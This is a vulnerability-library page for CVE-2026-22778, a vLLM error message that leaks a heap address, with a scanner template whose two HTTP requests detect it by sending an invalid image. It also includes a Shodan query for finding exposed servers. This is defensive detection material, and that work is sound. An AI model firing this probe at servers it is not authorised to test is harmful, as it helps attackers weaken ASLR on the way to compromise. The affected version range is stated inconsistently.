/Vulnerability Library

vLLM 0.8.3 - 0.14.0 - Information Disclosure

CVE-2026-22778
Early Release

Description

vLLM 0.8.3 to - 0.14.1 contains an information disclosure caused by leaking a heap address in error messages from the multimodal endpoint when processing invalid images, letting remote attackers reduce ASLR entropy, exploit requires sending invalid images.

Severity

Critical

CVSS Score

9.8

Exploit Probability

4%

Affected Product

vllm

Published Date

June 21, 2026

Template Author

kenlacroix

CVE-2026-22778.yaml
id: CVE-2026-22778

info:
  name: vLLM 0.8.3 - 0.14.0 - Information Disclosure
  author: kenlacroix
  severity: critical
  description: |
    vLLM 0.8.3 to - 0.14.1 contains an information disclosure caused by leaking a heap address in error messages from the multimodal endpoint when processing invalid images, letting remote attackers reduce ASLR entropy, exploit requires sending invalid images.
  impact: |
    Remote attackers can leak heap addresses, significantly reducing ASLR effectiveness and enabling further exploitation like remote code execution.
  remediation: |
    Upgrade to version 0.14.1 or later.
  reference:
    - https://github.com/vllm-project/vllm/security/advisories/GHSA-4r2x-xpjr-7cvv
    - https://orca.security/resources/blog/cve-2026-22778-vllm-rce-vulnerability/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-22778
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-22778
    epss-score: 0.03816
    epss-percentile: 0.88786
    cwe-id: CWE-209
  metadata:
    verified: true
    max-request: 2
    vendor: vllm
    product: vllm
    shodan-query: http.html:"/v1/models" http.html:"vllm"
    tags: cve,cve2026,vllm,llm,ai,disclosure,exposure,intrusive

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /v1/models HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"id\":")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: model
        part: body
        internal: true
        group: 1
        regex:
          - '"id"\s*:\s*"([^"]+)"'

  - raw:
      - |
        POST /v1/chat/completions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"model":"{{model}}","messages":[{"role":"user","content":[{"type":"text","text":"{{randstr}}"},{"type":"image_url","image_url":{"url":"data:image/png;base64,bm90YW5pbWFnZQ=="}}]}],"max_tokens":1}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains(body, "_io.BytesIO object at 0x")'
        condition: and
# digest: 4a0a00473045022034329c4ae2e6ff293d22a8e848395bb0964e38dc4086d46e96178763c0ec0590022100ed7ff285a750093372c885fcf16af95aa69fa5530726202906b715a8e2dcd2e2:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-22778
CWE ID:
cwe-209

References

https://github.com/vllm-project/vllm/security/advisories/GHSA-4r2x-xpjr-7cvvhttps://orca.security/resources/blog/cve-2026-22778-vllm-rce-vulnerability/https://nvd.nist.gov/vuln/detail/CVE-2026-22778

Remediation Steps

Upgrade to version 0.14.1 or later.